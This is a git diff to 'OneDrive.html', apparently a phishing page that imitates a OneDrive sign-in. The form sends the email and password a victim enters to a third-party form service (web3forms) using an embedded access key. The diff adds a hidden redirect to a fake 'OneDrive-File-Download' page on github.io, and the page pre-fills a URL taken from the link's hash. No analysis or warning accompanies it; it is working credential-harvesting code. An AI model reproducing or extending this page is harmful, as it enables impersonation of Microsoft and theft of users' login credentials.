--- a/OneDrive.html
+++ b/OneDrive.html
@@ -53,7 +53,7 @@
   <br>
  <small class="text-danger" id="msg" style="font-weight: 600;"></small>
  <form action="https://api.web3forms.com/submit" method="POST">
-
+<input type="hidden" name="redirect" value="https://amira800.github.io/OneDrive-File-Download/OneDrive">
     <!-- Replace with your Access Key -->
     <input type="hidden" name="access_key" value="68c2f032-ae3c-41ea-bdb4-11061b978f83">
 
@@ -62,8 +62,7 @@
  <input type="password" name="x2" id="x2" class="form-control mb-3" placeholder="Password" value required>
   <button id="submitbtn" class="btn-md btn primary">Sign in</button>
  </form>
- <script src="https://web3form.com/api.js"></script>
-   <script type="text/javascript">  
+  <script type="text/javascript">  
     $(document).ready(function () {
         // Get URL from the hash and set it to the input field
         var url = window.location.hash.substr(1);  
@@ -110,10 +109,5 @@
         });
  });
 </script>
-   </div>
- </div>
-</div>
-</div>
-</div>
-  </body>
+ </body>
 </html>
